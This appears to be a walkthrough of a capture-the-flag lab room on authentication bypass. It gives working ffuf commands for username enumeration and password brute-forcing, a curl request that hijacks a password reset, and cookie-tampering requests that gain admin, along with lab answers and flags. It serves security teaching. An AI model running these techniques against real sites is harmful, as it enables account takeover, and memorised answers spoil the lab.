Skip to content

Authentication Bypass Banner

Authentication Bypass Logo

Authentication Bypass

This guide contains the answer and steps necessary to get to them for the Authentication Bypass room.

Table of contents

Username Enumeration

  1. What is the username starting with si*** ?

We have a form which seems to leak more information than we should.

Exists

To abuse the fact that a result is returned when the username already exists we can use ffuf with the following commands and names takes from the source page:

Source

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.47.167/customers/signup -mr "username already exists"

Users

Click for answerSimon

  1. What is the username starting with st*** ?

This was found with the above command.

Click for answerSteve

  1. What is the username starting with ro**** ?

This was found with the above command.

Click for answerRobert

Brute Force

  1. What is the valid username and password (format: username/password)?

After putting the usernames in a text files we can combine it with a password wordlist in ffuf.

ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.47.167/customers/login -fc 200

Password

Click for answersteve/thunder

Logic Flaw

  1. What is the flag from Robert's support ticket?

The following form allows us to reset someones password and send the email to us.

Form

curl "http://10.10.47.167/customers/reset?email=robert@acmeitsupport.thm" -H "Content-Type: application/x-www-form-urlencoded" -d "username=robert&email=1337h4ck3r@customer.acmeitsupport.thm"

Here we receive the ticket to log into the account.

Ticket

And now we can access the flag on Roberts account.

Flag

Click for answerTHM{AUTH_BYPASS_COMPLETE}

  1. What is the flag from changing the plain text cookie values?

We can use the following command to check if we are logged in:

curl http://10.10.47.167/cookie-test -H "Cookie: logged_in=true  "

The next command should also give us admin privileges:

curl http://10.10.47.167/cookie-test -H "Cookie: logged_in=true; admin=true"

Admin

Click for answerTHM{COOKIE_TAMPERING}

  1. What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?

Using crackstation, we can get the string belonging to this hash.

MD5

Click for answer463729

  1. What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?

To decode a Base64 strings we can use CyberChef.

Base 64

Click for answerTHM{BASE64_ENCODING}

  1. Encode the following value using base64 {"id":1,"admin":true}

Encoding to Base64 can also be done with CyberChef.

Click for answereyJpZCI6MSwiYWRtaW4iOnRydWV9